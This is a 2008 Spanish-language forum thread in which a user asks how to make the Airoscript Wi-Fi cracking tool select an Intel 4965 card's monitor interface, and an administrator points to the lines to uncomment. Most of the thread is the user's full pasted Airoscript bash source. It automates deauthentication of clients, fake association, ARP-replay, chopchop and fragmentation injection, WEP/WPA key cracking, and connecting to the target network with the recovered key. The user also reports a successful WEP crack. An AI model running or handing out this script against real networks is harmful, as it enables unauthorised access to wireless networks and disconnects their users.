Autor Tema: adaptar airoscript para 4965  (Leído 4369 veces)

0 Usuarios y 1 Visitante están viendo este tema.

dexter back

  • Visitante
adaptar airoscript para 4965
« en: 20-09-2008, 19:03 (Sábado) »
hola que tal tengo la duda sobre el airoscript, ya que si  se modifico para la ipw2200, se podra modificar para la ipw4965?

ya que esta tarjeta inyecta y monitorea con la interfaz  mon0 creada gracias a los parches y a la hora de ejecutar el airoscript solo me da lo opcion de escoger la interfaz wlan0.

yo estoy casi seguro de que se puede hacer solo hace falta la yuda de los expertos  :-'

sugerencias...............sobre como se haria ^-^ ^-^ ^-^ ^-^



Desconectado Hwagm

  • Administrador
  • *
  • Mensajes: 18282
Re: adaptar airoscript para 4965
« Respuesta #1 en: 20-09-2008, 22:50 (Sábado) »
creoque esa parte de codigo ya esta añadida en algun lugar del foro, son las mismos codigos que se usan en los lanzadores de las lives.
POr ejemplo se ve la diferencia en el lanzador "Apoyo lanzadores" donde se observa lo que es wireless y todas las interfaces, pues en el airo se debe poner todas las interfaces

Es mas juaraia que el airo ya lleva la script solo que esta remada, simplemente se rema la que hay y s deja la otra, ya veras fijate en el codigo del airo

 ;)

o sea que esto ya viene de serie creado

Desconectado Hwagm

  • Administrador
  • *
  • Mensajes: 18282
Re: adaptar airoscript para 4965
« Respuesta #2 en: 21-09-2008, 09:27 (Domingo) »
function setinterface {
# INTERFACES=`iwconfig | grep ESSID | awk '{ print $1 }'| grep -v lo | grep -v inet*`
#INTERFACES=`cat /proc/net/dev | grep ":" | grep -v lo | grep -v sit | cut -d ":" -f 1 | tr -d " "`
INTERFACES=`ip link |egrep "^[0-9]+" | cut -d':' -f 2 | cut -d' ' -f 2 | grep -v "lo" |awk '{print $1}'`
   clear
   if [ $WIFI =  ]
      then
         echo "Selecciona el interface wifi a usar:"
         echo " "
            select WIFI in $INTERFACES; do
            break;
         done
      clear
      echo "Interface seleccionado: $WIFI"
   else
      clear
   fi
}
# this function allows debugging of xterm commands

Desconectado Hwagm

  • Administrador
  • *
  • Mensajes: 18282
Re: adaptar airoscript para 4965
« Respuesta #3 en: 21-09-2008, 09:29 (Domingo) »
# INTERFACES=`iwconfig | grep ESSID | awk '{ print $1 }'| grep -v lo | grep -v inet*`
#INTERFACES=`cat /proc/net/dev | grep ":" | grep -v lo | grep -v sit | cut -d ":" -f 1 | tr -d " "`
INTERFACES=`ip link |egrep "^[0-9]+" | cut -d':' -f 2 | cut -d' ' -f 2 | grep -v "lo" |awk '{print $1}'`

-------------------------------

la ultima te sacara todas las interfaces, estos codigos estan siempre en el airo, para que tu dedicas cual usar

dexter back

  • Visitante
Re: adaptar airoscript para 4965
« Respuesta #4 en: 21-09-2008, 13:21 (Domingo) »
Citar
INTERFACES=`ip link |egrep "^[0-9]+" | cut -d':' -f 2 | cut -d' ' -f 2 | grep -v "lo" |awk '{print $1}'`

esto lo teclo en una shell y listo?

con eso ya saldran todas las interfaces?

ya la desrremaste??? :o :o

por que de otro modo no identifico cual es la que tengo que desrremar, si es que no la haz desrremado podrias ponerlo en negrita la parte  que hay que desrremar   



ja ja ja ja

esto ya parece trabaleguas
      ;D


la verdad es que es un poco confuso, haber lo que entiendo es que el airoscript viene original como esta el 1er post y debe de quedar como esta el segundo?????? :-[

gracias intentare provar y os cuento.

 ha por cierto logre la inyeccion sin clientes con la 4965 en 35 minutos salio
key found: XX:xx:xx:xx:Xx   :-' :-' :-' :-' :-'

con 16500 ivs

inyecta entre 6 y 13 paquetes por segundo pero funciona  ;D


te anexo mi script del airo...para ver si pueder citar en negrita lo que hay que modificar si es que hay algo que modificar gracias.


Citar
#! /bin/bash

# Program:   Airoscript                                                         
# Authors:   Base Code by Daouid; Mods & Tweaks by CurioCT and others
# Credits:      Hirte, Befa, Stouf, Mister_X, ASPj , Andrea, Pilotsnipes and darkAudax
# Date:           21.01.2007
# Version:   BETA-1 2.0.7 TESTING RELEASE FOR AIRCRACK-NG 0.7
#
# Dependencies: aircrack-ng,xterm,grep,awk,drivers capable of injection
#
#      To change color theme just do a search and replace
#
#     Colors:   #Dumping   White   #FFFFFF                                           
#               #Injection   Green   #1DFF00                                           
#               #Association   Red   #FF0009                                           
#               #Deauth           Blue   #99CCFF                                           
#               #Background   Black   #000000                                           
#                                                                                           
# Notes:  Important  ===>>>  Set variable DEBUG to 1 to enable debugging of errors  <<<===
#
WELCOME="0"
DEBUG="0"
#This is the interface you want to use to perform the attack
#If you dont set this, airoscript will ask you for interface to use
WIFI=""
#This is the rate per second at wich packets will be injected
INJECTRATE="1024"
#How many times the deauth attack is run
DEAUTHTIME="4"
#Time between re-association with target AP
AUTHDELAY="45"
#Fudge factor setting
FUDGEFACTOR="2"
#Path to binaries                                     
AIRMON="airmon-ng"      
AIRODUMP="airodump-ng"
AIREPLAY="aireplay-ng"   
AIRCRACK="aircrack-ng"
ARPFORGE="packetforge-ng"
#The path where the data is stored (FOLDER MUST EXIST !)
DUMP_PATH="/tmp"
# Path to your wordlist file (for WPA dictionnary attack, maybe for WEP in next release to)
WORDLIST="/tmp/english.txt"
#The Mac address used to associate with AP during fakeauth         
FAKE_MAC="00:01:02:03:04:05"
# IP of the access to be used for CHOPCHOP and Fragmentation attack
Host_IP="192.168.1.1"
FRAG_HOST_IP="255.255.255.255"
# same for client
Client_IP="192.168.1.37"
FRAG_CLIENT_IP="255.255.255.255"
# leave this alone (if you edit this, it will screw up the menu)
CHOICES="1 2 3 4 5 6 7 8 9 10 11 12 13 14 15"
#This is the window size and layout settings
# Upper left window +0+0 (size*size+position+position)
TOPLEFT="-geometry 96x25+0+0"
# Upper right window -0+0
TOPRIGHT="-geometry 70x25-0+0"
# Bottom left window +0-0
BOTTOMLEFT="-geometry 96x25+0-0"
# Bottom right window -0-0
BOTTOMRIGHT="-geometry 70x25-0-0"
TOPLEFTBIG="-geometry 96x60+0+0"
TOPRIGHTBIG="-geometry 70x60-0+0"
##################################################################################
#
#  Functions: these are all the commands used by the script
#
# starts monitor mode on selected interface      
function monitor_interface {
IS_MONITOR=`$AIRMON start $WIFI |grep monitor`
   clear
   echo $IS_MONITOR
}
# this sets wifi interface if not hard coded in the script
function setinterface {
INTERFACES=`iwconfig | grep ESSID | awk '{ print $1 }'| grep -v lo | grep -v inet*`
   clear
   if [ $WIFI =  ]
      then
         echo "Choose wich network interface you would like to use:"
         echo " "
            select WIFI in $INTERFACES; do
            break;
         done
      clear
      echo "Interface to use is now set to: $WIFI"
   else
      clear
   fi
}
# this function allows debugging of xterm commands
function debug {
   clear
   if [ $DEBUG = 1 ]
      then
         echo "Debug Mode On"
         echo " "
         HOLD="-hold"
      clear
   else
      HOLD=""
      clear
   fi
}
# This is another great contribution from CurioCT that allows you to manually enter SSID if none is set
function blankssid {
while true; do
  clear
  echo ""
  echo "A blank SSID has been detected, would you like to manually enter an SSID?"
  echo ""
  echo "1) Yes "
  echo "2) No "
  read yn
  echo ""
  case $yn in
    1 ) Host_ssidinput ; break ;;
    2 ) Host_SSID="" ; break ;;
    * ) echo "unknown response. Try again" ;;
esac
done
}
# This is the input part of previous function
function Host_ssidinput {
echo -n "OK, now type in the ESSID ==> "
read Host_SSID
echo You typed $Host_SSID
set -- ${Host_SSID}
clear
}
# This is the function to select Target from a list   
function Parseforap {
## MAJOR CREDITS TO: Befa , MY MASTER, I have an ALTAR dedicated to him in my living room 
## And HIRTE for making all those great patch and fixing the SSID issue
ap_array=`cat $DUMP_PATH/dump-01.txt | grep -a -n Station | awk -F : '{print $1}'`
head -n $ap_array $DUMP_PATH/dump-01.txt &> $DUMP_PATH/dump-02.txt
clear
echo ""
echo "    Here are the access point detected during step 1"
echo ""
echo " #      MAC                      CHAN    SECU    POWER   #CHAR   SSID"
echo ""
i=0
while IFS=, read MAC FTS LTS CHANNEL SPEED PRIVACY CYPHER AUTH POWER BEACON IV LANIP IDLENGTH ESSID KEY;do
 longueur=${#MAC}
   if [ $longueur -ge 17 ]; then
    i=$(($i+1))
    echo -e " "$i")\t"$MAC"\t"$CHANNEL"\t"$PRIVACY"\t"$POWER"\t"$IDLENGTH"\t"$ESSID
    aidlenght=$IDLENGTH
    assid[$i]=$ESSID
    achannel[$i]=$CHANNEL
    amac[$i]=$MAC
    aprivacy[$i]=$PRIVACY
   fi
done < $DUMP_PATH/dump-02.txt
echo ""
echo "    Please enter desired Access Point's Number"
echo ""
read choice
idlenght=${aidlenght[$choice]}
ssid=${assid[$choice]}
channel=${achannel[$choice]}
mac=${amac[$choice]}
privacy=${aprivacy[$choice]}
Host_IDL=$idlength
Host_ENC=$privacy
Host_MAC=$mac
Host_CHAN=$channel
acouper=${#ssid}
fin=$(($acouper-idlength))
Host_SSID=${ssid:1:fin}
}


# This is a simple function to ask what type of scan you want to run
function choosescan {
while true; do
  clear
  echo "Airodump will now be launched, hit ctrl+c when target(s) is found"
  echo ""
  echo "Do you want to scan on multiple channels or on a specific channel?"
  echo ""
  echo "1) Channel Hopping "
  echo "2) Specific channel(s) ex: 11 or  1,5-7,9,11-13 or 1,6,11 or 1-6 "
  read yn
  echo ""
  case $yn in
    1 ) Scan ; break ;;
    2 ) Scanchan ; break ;; 
    * ) echo "unknown response. Try again" ;;
  esac
done
}
# This function ask after an AP selection for a client sel
function choosetarget {
while true; do
  clear
  echo ""
  echo "Do you want to select a client now ?"
  echo ""
  echo "1) Yes "
  echo "2) No "
  echo "3) Try to detect associated client"
  echo "4) Correct a bad SSID"
  echo "5) Jump to associated client list"
  read yn
  echo ""
  case $yn in
    1 ) askclientsel ; break ;;
    2 ) break ;;
    3 ) clientdetect && clientfound ; break ;;
    4 ) Host_ssidinput && choosetarget ; break ;;
    5 ) listsel2 ; break ;;
    * ) echo "unknown response. Try again" ;;
  esac
done
}
# this ask if the client scan was successfull
function clientfound {
while true; do
  clear
  echo ""
  echo "Did you find desired client?"
  echo ""
  echo "1) Yes "
  echo "2) No "
  read yn
  echo ""
  case $yn in
    1 ) listsel3 ; break ;;
    2 ) break ;;
    * ) echo "unknown response. Try again" ;;
  esac
done
}
# deauth type sel
function choosedeauth {
while true; do
  clear
  echo ""
  echo "What kind of deauth do you want to do ?"
  echo ""
  echo "1) Everybody "
  echo "2) Myself "
  echo "3) Selected Client"
  read yn
  echo ""
  case $yn in
    1 ) deauthall ; break ;;
    2 ) deauthfake ; break ;;
    3 ) deauthclient ; break ;;
    * ) echo "unknown response. Try again" ;;
  esac
done
}
# this function ask for attack type
function attackwep {
while true; do
  clear
  echo "WEP ATTACK MODE"
  echo ""
  echo "Which attack would you like to perform?"
  echo ""
  echo "1) Fake association => Automatic"
  echo "2) Fake association => Interactive"
  echo "3) Using a client   => Automatic"
  echo "4) Using a client   => Interactive"
  echo "5) Fragmentation attack"
  echo "6) Chopchop attack"
  echo "7) Chopchop attack using a client"
  echo "8) Solo interactive attack (attempt to jump start stalled injections)"
  echo "9) Chopchop attack injection part of the attack"
  echo "10) Chopchop attack using a client injection part of the attack"
  read yn
  echo ""
  case $yn in
    1 ) attack ; break ;;
    2 ) fakeinteractiveattack ; break ;;
    3 ) attackclient ; break ;;
    4 ) interactiveattack ; break ;;
    5 ) fragmentationattack ; break ;;
    6 ) chopchopattack ; break ;;
    7 ) chopchopattackclient ; break ;;
    8 ) solointeractiveattack ; break ;;
    9 ) chopchopend ; break ;;
   10 ) chopchopclientend ; break ;;
    * ) echo "unknown response. Try again" ;;
  esac
done
}
# this function ask for attack type
function attackopn {
while true; do
  clear
  echo "OPEN ATTACK MODE"
  echo ""
  echo "Which attack would you like to perform?"
  echo ""
  echo "1) Deauth           => Everybody"
  echo "2) Deauth           => Client"
  read yn
  echo ""
  case $yn in
    1 ) deauthall ; break ;;
    2 ) deauthclient ; break ;;
    * ) echo "unknown response. Try again" ;;
  esac
done
}
# client origin
function askclientsel {
while true; do
  clear
  echo ""
  echo "Do you want to select the client from a list or enter MAC address manually ?"
  echo ""
  echo "1) Detected clients "
  echo "2) Manual Input "
  echo "3) Jump to associated client list "
  read yn
  echo ""
  case $yn in
    1 ) asklistsel ; break ;;
    2 ) clientinput ; break ;;
    3 ) listsel2 ; break ;;
    * ) echo "unknown response. Try again" ;;
  esac
done
}
# manual client input
function clientinput {
echo -n "OK, now type in your client MAC: "
read Client_MAC
echo You typed: $Client_MAC
set -- ${Client_MAC}
}
# associated client or all clients ?
function asklistsel {
while true; do
  clear
  echo ""
  echo "Do you want to select the client from full list or associated clients only ?"
  echo ""
  echo "1) Only associated clients (Client connected to this SSID : $Host_SSID)"
  echo "2) Full list (All MAC detected, even Host are listed)"
if [ "$Host_SSID" = $'\r' ]
        then
Host_SSID="No SSID has been detected!"
fi
  echo 
read yn
  case $yn in
    1 ) listsel2 ; break ;;
    2 ) listsel1 ; break ;;
    * ) echo "unknown response. Try again" ;;
  esac
done
}
# sel client from list       
function listsel1 {
HOST=`cat $DUMP_PATH/dump-01.txt | grep -a "0.:..:..:..:.." | awk '{ print $1 }'| grep -a -v 00:00:00:00`
   clear
   echo "Select wich client you want to use for ARP replay"
   echo ""
   select CLIENT in $HOST;
      do
      export Client_MAC=` echo $CLIENT | awk '{
            split($1, info, "," )
            print info[1]  }' `   
      break;
   done
}
# sel client from list, shows only associated clients        
function listsel2 {
HOST=`cat $DUMP_PATH/dump-01.txt | grep -a $Host_MAC | awk '{ print $1 }'| grep -a -v 00:00:00:00| grep -a -v $Host_MAC`
   clear
   echo "Select which client you want to use for ARP replay"
   echo ""
   echo "The client(s) listed bellow is(are) connected to ==> "$Host_SSID
   echo ""
   select CLIENT in $HOST;
      do
      export Client_MAC=` echo $CLIENT | awk '{
            split($1, info, "," )
            print info[1]  }' `   
      break;
   done
}
# sel client from list, shows only associated clients        
function listsel3 {
HOST=`cat $DUMP_PATH/$Host_MAC-01.txt | grep -a $Host_MAC | awk '{ print $1 }'| grep -a -v 00:00:00:00| grep -a -v $Host_MAC`
   clear
   echo "Select which client you want to use for ARP replay"
   echo ""
   echo "The client(s) listed bellow is(are) connected to ==> "$Host_SSID
   echo ""
   select CLIENT in $HOST;
      do
      export Client_MAC=` echo $CLIENT | awk '{
            split($1, info, "," )
            print info[1]  }' `   
      break;
   done
}
# reset and killall commands , + ejection/interruption of interface   
function cleanup {
   killall -9 aireplay-ng airodump-ng > /dev/null &
   ifconfig $WIFI down
   cardctl eject
   sleep 2
   cardctl insert
   ifconfig $WIFI up
   $AIRMON start $WIFI $Host_CHAN
   iwconfig $WIFI
}
# menu listing command   
function menu {
      echo ""
      echo "1.  Scan      ==> Launch a Scan to find targets"
      echo "2.  Select    ==> Select desired target: Host and Client"
      echo "3.  Attack    ==> Launch attack"
      echo "4.  Crack     ==> Starts searching for key with aircrack"
      echo "5.  Configure ==> Configure PC to connect using key found and DHCP"
      echo "6.  Associate ==> Try to associate to AP using a FAKE MAC"
      echo "7.  Deauth    ==> Disconnect desired station(s) from target"
      echo "8.  Reset     ==> Kills all airo-threads and reset card(pcmcia socket)"
      echo "9.  Monitor   ==> Enable monitor mode using airmon-ng"
      echo "10. Quit  "
      echo "11. AUTO      ==> step 1,2,3 linked"
      echo ""
      echo ""         
}
# target listing   
function target {
      clear
      echo "Access Point SSID     ==> "$Host_SSID
      echo "Access Point MAC      ==> "$Host_MAC
      echo "Access Point Channel  ==> "$Host_CHAN
      echo "Selected client       ==> "$Client_MAC
      echo "Access Point Security ==> "$Host_ENC

# interface configuration using found key (tweaks by CurioCT)    
function configure {
      $AIRCRACK -a 1 -b $Host_MAC -f $FUDGEFACTOR -0 $DUMP_PATH/$Host_MAC-01.cap &> $DUMP_PATH/$Host_MAC.key
      KEY=`cat $DUMP_PATH/$Host_MAC.key | grep -a KEY | awk '{ print $4 }'`
      echo "Using this key $KEY to connect to: $Host_SSID"
      echo ""
      echo "Setting: iwconfig $WIFI mode Managed"
      ifconfig $WIFI down
      sleep 3
      ifconfig $WIFI up
      sleep 2
      iwconfig $WIFI mode Managed ap any rate auto channel $Host_CHAN essid "$Host_SSID" key restricted $KEY
      sleep 1
      echo "Setting: iwconfig $WIFI essid $Host_SSID"
      iwconfig $WIFI essid "$Host_SSID"
      echo "Setting: iwconfig $WIFI key $KEY"
      iwconfig $WIFI key restricted $KEY
      echo "Setting: dhcpcd $WIFI"
      sleep 1
      iwconfig $WIFI rate auto
      iwconfig $WIFI ap any
      sleep 3
      iwconfig $WIFI ap any rate auto mode Managed channel $Host_CHAN essid "$Host_SSID" key restricted $KEY
      sleep 3
      dhcpcd $WIFI
      echo "Will now ping google.com"
      ping www.google.com
}
function wpaconfigure {
      $AIRCRACK -a 2 -b $Host_MAC -0 -s $DUMP_PATH/$Host_MAC-01.cap -w $WORDLIST &> $DUMP_PATH/$Host_MAC.key
      KEY=`cat $DUMP_PATH/$Host_MAC.key | grep -a KEY | awk '{ print $4 }'`
      echo "Using this key $KEY to connect to: $Host_SSID"
      echo ""
      echo "Setting: iwconfig $WIFI mode Managed"
      ifconfig $WIFI down
      sleep 3
      ifconfig $WIFI up
      sleep 2
      iwconfig $WIFI mode Managed ap any rate auto channel $Host_CHAN essid "$Host_SSID" key restricted $KEY
      sleep 1
      echo "Setting: iwconfig $WIFI essid $Host_SSID"
      iwconfig $WIFI essid "$Host_SSID"
      echo "Setting: iwconfig $WIFI key $KEY"
      iwconfig $WIFI key restricted $KEY
      echo "Setting: dhcpcd $WIFI"
      sleep 1
      iwconfig $WIFI rate auto
      iwconfig $WIFI ap any
      sleep 3
      iwconfig $WIFI ap any rate auto mode Managed channel $Host_CHAN essid "$Host_SSID" key restricted $KEY
      sleep 3
      dhcpcd $WIFI
      echo "Will now ping google.com"
      ping www.google.com
}
##################################################################################
#
#   Attack functions
function witchcrack {
if [ $Host_ENC = "WEP" ]
        then
      echo "Will launch aircrack-ng searching for WEP KEY"
      crack
      elif [ $Host_ENC = "WPA" ]
      then
      echo "Will launch aircrack-ng searching for WPA KEY"
      wpacrack
      else
      echo "unknown encryption type"
      fi         
}
function witchattack {
if [ $Host_ENC = "WEP" ]
        then
      echo "Will launch aircrack-ng searching for WEP KEY"
      attackwep
      elif [ $Host_ENC = "WPA" ]
      then
      echo "Will launch aircrack-ng searching for WPA KEY"
      wpahandshake
      else
      echo "unknown encryption type"
      attackopn
      fi         
}
function witchconfigure {
if [ $Host_ENC = "WEP" ]
        then
      echo "Will configure interface using WEP KEY"
      configure
      elif [ $Host_ENC = "WPA" ]
      then
      echo "Will configure interface using WPA KEY"
      wpaconfigure
      else
      echo "unknown encryption type"
      fi         
}
# aircrack command
function crack   {
   xterm $HOLD $TOPRIGHT -title "Aircracking: $Host_SSID" -hold -e $AIRCRACK -a 1 -b $Host_MAC -f $FUDGEFACTOR -0 -s $DUMP_PATH/$Host_MAC-01.cap
}
# WPA attack function
function wpahandshake {
   clear
   rm -rf $DUMP_PATH/$Host_MAC*
   xterm $HOLD -title "Capturing data on channel: $Host_CHAN" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e $AIRODUMP -w $DUMP_PATH/$Host_MAC --channel $Host_CHAN $WIFI & deauthclient
}
function wpacrack {
xterm $HOLD $TOPRIGHT -title "Aircracking: $Host_SSID" -hold -e $AIRCRACK -a 2 -b $Host_MAC -0 -s $DUMP_PATH/$Host_MAC-01.cap -w $WORDLIST
}
function Scan {
   clear
   rm -rf $DUMP_PATH/dump*
   xterm $HOLD -title "Scanning for targets" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e $AIRODUMP -w $DUMP_PATH/dump $WIFI
}
# This scan for targets on a specific channel
function Scanchan {
echo -n "On which channel would you like to scan ? ==> "
read channel_number
echo You typed: $channel_number
set -- ${channel_number}
   clear
   rm -rf $DUMP_PATH/dump*
   xterm $HOLD -title "Scanning for targets on channel $channel_number" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e $AIRODUMP -w $DUMP_PATH/dump --channel "$channel_number" $WIFI
}
function capture {
   clear
   rm -rf $DUMP_PATH/$Host_MAC*
   xterm $HOLD -title "Capturing data on channel: $Host_CHAN" $TOPLEFT -bg "#000000" -fg "#FFFFFF" -e $AIRODUMP --bssid $Host_MAC -w $DUMP_PATH/$Host_MAC -c $Host_CHAN $WIFI
}
function deauthall {
   xterm $HOLD $TOPRIGHT -bg "#000000" -fg "#99CCFF" -title "Kicking everybody from: $Host_SSID" -e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC $WIFI
}
function deauthclient {
   xterm $HOLD $TOPRIGHT -bg "#000000" -fg "#99CCFF" -title "Kicking $Client_MAC from: $Host_SSID" -e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $Client_MAC $WIFI
}
function deauthfake {
   xterm $HOLD $TOPRIGHT -bg "#000000" -fg "#99CCFF" -title "Kicking $FAKE_MAC from: $Host_SSID" -e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $FAKE_MAC $WIFI
}
function fakeauth {
xterm $HOLD -title "Associating with: $Host_SSID " $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -e $AIREPLAY --fakeauth $AUTHDELAY -e "$Host_SSID" -a $Host_MAC -h $FAKE_MAC $WIFI
}
# This is a set of command to manually kick all clients from selected AP to discover them
function clientdetect {
   capture & deauthall
}
# attack against client when a previous attack has stalled
function solointeractiveattack {
   xterm $HOLD -title "Interactive Packet Sel on: $Host_SSID" $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" -e $AIREPLAY $WIFI --interactive -b $Host_MAC -d FF:FF:FF:FF:FF:FF -x $INJECTRATE & deauthclient
}
# fake attack function   
function attack {
   capture & xterm $HOLD -title "Injection: Host: $Host_MAC" $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" -e $AIREPLAY $WIFI --arpreplay -b $Host_MAC -h $FAKE_MAC  -x $INJECTRATE & fakeauth & deauthfake
}
# client type attack function
function attackclient {
   capture & xterm $HOLD -title "Injection: Host : $Host_MAC CLient : $Client_MAC" $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" -e $AIREPLAY $WIFI --arpreplay -b $Host_MAC -h $Client_MAC -x $INJECTRATE & deauthclient
}
# interactive attack with client
function interactiveattack {
   capture & xterm $HOLD -title "Interactive Packet Sel on: $Host_SSID" $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" -e $AIREPLAY $WIFI --interactive -b $Host_MAC -d FF:FF:FF:FF:FF:FF -x $INJECTRATE -t 1 -f 0 -m 68 -n 68  & deauthclient
}
# interactive attack with fake mac
function fakeinteractiveattack {
   capture & xterm $HOLD -title "Interactive Packet Sel on Host: $Host_SSID" $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" -e $AIREPLAY $WIFI --interactive -b $Host_MAC -d FF:FF:FF:FF:FF:FF -x $INJECTRATE -t 1 -f 0 -m 68 -n 68  & fakeauth & deauthfake
}

# Unstable allround function
function airomatic {
choosescan
Parseforap
choosetarget
attacktype
#sleep 60
#crack & configure   
}
# Experimental features
function chopchopattack {
   clear
rm -rf $DUMP_PATH/$Host_MAC*
   capture &  fakeauth &  xterm $HOLD -title "ChopChop'ing: $Host_SSID" $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" -e $AIREPLAY --chopchop -b $Host_MAC $WIFI
}
function chopchopattackclient {
   clear
rm -rf $DUMP_PATH/$Host_MAC*
   capture &  xterm $HOLD -title "ChopChop'ing: $Host_SSID" $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" -e $AIREPLAY --chopchop -h $Client_MAC $WIFI & deauthclient
}
function chopchopend {
rm -rf $DUMP_PATH/chopchop_$Host_MAC*
   $ARPFORGE -0 -a $Host_MAC -h $FAKE_MAC -k $Client_IP -l $Host_IP -w $DUMP_PATH/chopchop_$Host_MAC.cap -y *.xor   
   capture & xterm $HOLD $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" -title "Sending chopchop to: $Host_SSID" -e $AIREPLAY --interactive -r $DUMP_PATH/chopchop_$Host_MAC.cap $WIFI
}
function chopchopclientend {
rm -rf $DUMP_PATH/chopchop_$Host_MAC*
   $ARPFORGE -0 -a $Host_MAC -h $Client_MAC -k $Client_IP -l $Host_IP -w $DUMP_PATH/chopchop_$Host_MAC.cap -y *.xor
   capture & xterm $HOLD $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" -title "Sending chopchop to: $Host_SSID" -e $AIREPLAY --interactive -r $DUMP_PATH/chopchop_$Host_MAC.cap $WIFI
}

function fragmentationattack {
rm -rf $DUMP_PATH/fragment-*.xor
rm -rf $DUMP_PATH/$Host_MAC*
killall -9 airodump-ng aireplay-ng
# iwconfig $WIFI rate 1M channel $Host_CHAN mode monitor
deauthclient & xterm $HOLD $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" -title "Fragmentation attack on $Host_SSID" -e $AIREPLAY -5 -b $Host_MAC -h $Client_MAC -k $FRAG_CLIENT_IP -l $FRAG_HOST_IP $WIFI & capture

$ARPFORGE -0 -a $Host_MAC -h $Client_MAC -k $Client_IP -l $Host_IP -y fragment-*.xor -w $DUMP_PATH/frag_$Host_MAC.cap

capture & xterm $HOLD $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" -title "Injecting forged packet on $Host_SSID" -e $AIREPLAY -2 -r $DUMP_PATH/frag_$Host_MAC.cap -x $INJECTRATE $WIFI & menufonction
}
function menufonction {
xterm $HOLD $TOPRIGHT -title "Fake function to jump to menu" -e echo "Aircrack-ng is a great tool, Mister_X ASPj HIRTE are GODS"
}
function greetings {
if [ $WELCOME = 1 ]
   then
echo "Welcome to Airoscript"
echo ""
echo "Airoscript is an educational tool designed to "
echo "encourage shell scripting and WIFI security learning"
echo ""
echo "Before you continue make sure you have set proper settings"
echo "Open this script in a text editor and configure variables"
echo ""
echo "First you need to make sure you have a working folder for Airoscript"
echo "Airoscript needs a real folder to work into"
echo ""
echo "Than you could set your interface and check binaries path"
echo "If you encounter errors please set the variable DEBUG to 1"
echo "This will allow you to see errors messages in xterm"
echo ""
echo "This message will disappear in a few seconds"
sleep 15
   else
      echo "no welcome msg for you"
fi
}

##################################################################################
#
# Main Section this is the "menu" part, where all the functions are called      
#
#
   clear
   greetings
   setinterface
   debug
   menu   
select choix in $CHOICES; do               
   if [ "$choix" = "1" ]; then
   choosescan
   clear
   menu
   echo "Airodump closed, now use option 2 to select target"
   echo " "               
   elif [ "$choix" = "2" ]; then
   Parseforap
   clear
   choosetarget
   if [ "$Host_SSID" = $'\r' ]
    then blankssid;
   target
   menu
   elif [ "$Host_SSID" = "No SSID has been detected!" ]
   then blankssid;
   target
   menu
   else
   target
   echo " "
   menu
   fi               
   elif [ "$choix" = "3" ]; then
   witchattack   
   clear
   echo "Attack starting with variables set to :"
   target
   sleep 2;
   menu
   elif [ "$choix" = "4" ]; then
   echo "launching aircrack, if aircrack shell closes quickly, try again with more IVs"
   witchcrack
   menu
   elif [ "$choix" = "5" ]; then
   witchconfigure
   menu   
   elif [ "$choix" = "6" ]; then
   echo launching fake auth commands
   fakeauth & menu   
   elif [ "$choix" = "7" ]; then
   choosedeauth
   menu
   elif [ "$choix" = "8" ]; then
   echo "Will restart interface and kill all airodump-ng and aireplay-ng threads"
   cleanup
   menu
   elif [ "$choix" = "9" ]; then
   monitor_interface
   menu
   elif [ "$choix" = "11" ]; then
   airomatic
   menu
   elif [ "$choix" = "10" ]; then
   echo Script terminated
exit         
   else
   clear
   menu
   echo " "
   echo "You did not enter a value in the menu, please try again"
   echo " "               
   fi
done
#END
« Última modificación: 21-09-2008, 16:01 (Domingo) por dexter back »

Desconectado Hwagm

  • Administrador
  • *
  • Mensajes: 18282
Re: adaptar airoscript para 4965
« Respuesta #5 en: 21-09-2008, 18:03 (Domingo) »
esto te pasa porque estas usando un airoscript que no esta en nuestras lives, porque en las ultimas creo que elimine lo del iwconfig, o quizas no, igual es las zetas que yo tengo, en todo caso

no hay que teclera nada solo modificar el codigo

es que no te fijas bien

INTERFACES=`iwconfig | grep ESSID | awk '{ print $1 }'| grep -v lo | grep -v inet*`

ese es el que tienes tu, que me repito, eso es porque estas usando el airo oficial que no te valdra para mucho segun el kernel que tengas, pero en fin..........

si yo te he puesto esto

function setinterface {
# INTERFACES=`iwconfig | grep ESSID | awk '{ print $1 }'| grep -v lo | grep -v inet*`
#INTERFACES=`cat /proc/net/dev | grep ":" | grep -v lo | grep -v sit | cut -d ":" -f 1 | tr -d " "`
INTERFACES=`ip link |egrep "^[0-9]+" | cut -d':' -f 2 | cut -d' ' -f 2 | grep -v "lo" |awk '{print $1}'`
   clear
   if [ $WIFI =  ]
      then
         echo "Selecciona el interface wifi a usar:"
         echo " "
            select WIFI in $INTERFACES; do
            break;
         done
      clear
      echo "Interface seleccionado: $WIFI"
   else
      clear
   fi
}
# this function allows debugging of xterm commands

y en el tuyo esta esto

unction setinterface {
INTERFACES=`iwconfig | grep ESSID | awk '{ print $1 }'| grep -v lo | grep -v inet*`
   clear
   if [ $WIFI =  ]
      then
         echo "Choose wich network interface you would like to use:"
         echo " "
            select WIFI in $INTERFACES; do
            break;
         done
      clear
      echo "Interface to use is now set to: $WIFI"
   else
      clear
   fi
}

------------------

y encima te digo esto

# INTERFACES=`iwconfig | grep ESSID | awk '{ print $1 }'| grep -v lo | grep -v inet*`
#INTERFACES=`cat /proc/net/dev | grep ":" | grep -v lo | grep -v sit | cut -d ":" -f 1 | tr -d " "`
INTERFACES=`ip link |egrep "^[0-9]+" | cut -d':' -f 2 | cut -d' ' -f 2 | grep -v "lo" |awk '{print $1}'`

-------------------------------

la ultima te sacara todas las interfaces, estos codigos estan siempre en el airo, para que tu dedicas cual usar

-----------------------

haber que mas te puedo decir, sabiendo que # anula la linea de codigo, pues es que ya no se como explicaterlo






« Última modificación: 21-09-2008, 18:04 (Domingo) por Hwagm »

dexter back

  • Visitante
Re: adaptar airoscript para 4965
